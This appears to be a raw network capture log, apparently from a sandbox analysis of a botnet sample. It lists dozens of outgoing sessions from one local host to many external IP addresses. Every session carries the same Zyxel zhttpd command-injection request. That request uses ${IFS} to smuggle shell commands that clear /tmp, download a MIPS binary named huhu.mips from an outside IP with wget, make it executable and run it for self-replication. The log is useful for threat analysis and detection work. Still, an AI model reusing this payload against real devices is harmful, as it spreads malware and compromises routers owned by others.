                                                        Feb 2, 2024 06:21:26.256261110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8476192.168.2.145493268.77.86.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256285906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8477192.168.2.1452350177.189.144.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256339073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8478192.168.2.145716273.159.172.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256372929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8479192.168.2.1442178188.37.131.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256403923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8480192.168.2.1440446115.55.73.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256436110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8481192.168.2.1443832207.138.98.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256484985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8482192.168.2.1445020193.123.248.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256548882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8483192.168.2.143505076.30.69.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256582975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8484192.168.2.1440348217.145.207.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256639957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8485192.168.2.1440148185.127.36.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256664991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8486192.168.2.1442258171.215.218.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256695032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8487192.168.2.1444236105.150.165.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256721020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8488192.168.2.1451914173.177.39.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256776094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8489192.168.2.1452910218.118.130.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256827116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8490192.168.2.144487898.91.196.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256874084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8491192.168.2.1441408183.223.78.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256917953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8492192.168.2.144434667.234.26.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.256973982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8493192.168.2.144210464.128.216.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257006884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8494192.168.2.1437844200.86.6.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257057905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8495192.168.2.144839492.119.206.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257108927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8496192.168.2.145457424.93.164.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257138968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8497192.168.2.143825298.99.198.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257190943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8498192.168.2.14462005.224.219.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257250071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8499192.168.2.1450894138.236.197.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257293940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8500192.168.2.143494836.41.65.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257325888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8501192.168.2.143707088.46.155.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257385969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8502192.168.2.1454858199.91.247.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257421017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8503192.168.2.146094071.144.139.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257455111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8504192.168.2.1438060118.61.82.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257486105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8505192.168.2.1452336167.156.88.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257524967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8506192.168.2.1434712135.82.192.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257560015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8507192.168.2.144428493.26.191.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257601023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8508192.168.2.146020684.241.75.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257637978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8509192.168.2.145273490.6.129.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257692099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8510192.168.2.144104096.25.2.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257730961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8511192.168.2.143324819.77.153.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257783890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8512192.168.2.1448732173.164.116.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257812977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8513192.168.2.1435528173.235.228.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257874966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8514192.168.2.144891271.229.24.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257911921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8515192.168.2.1458388145.166.96.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257945061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8516192.168.2.1455088116.229.28.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.257999897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8517192.168.2.145193219.147.115.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258066893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8518192.168.2.144669877.15.98.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258093119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8519192.168.2.144592498.148.36.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258131981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8520192.168.2.145749096.85.180.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258168936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8521192.168.2.1449416211.49.163.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258218050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8522192.168.2.146005293.96.152.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258239985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8523192.168.2.1460216213.252.207.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258270025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8524192.168.2.143410459.135.63.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258331060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8525192.168.2.1450672173.5.213.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258377075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8526192.168.2.1455684176.227.9.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258408070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8527192.168.2.144065079.209.187.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258464098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8528192.168.2.1440210114.105.104.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258522987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8529192.168.2.143448835.49.192.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258544922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8530192.168.2.1455842183.192.51.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258615017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8531192.168.2.1455260118.33.94.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258641958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8532192.168.2.1439484203.90.228.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258671999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8533192.168.2.1448012140.52.96.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258704901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8534192.168.2.1454494150.28.212.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258768082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8535192.168.2.144903440.0.232.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258812904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8536192.168.2.144299260.0.146.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258846045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8537192.168.2.144091047.227.185.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:26.258907080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8538192.168.2.1446446219.84.65.201443
                                                        TimestampBytes transferredDirectionData
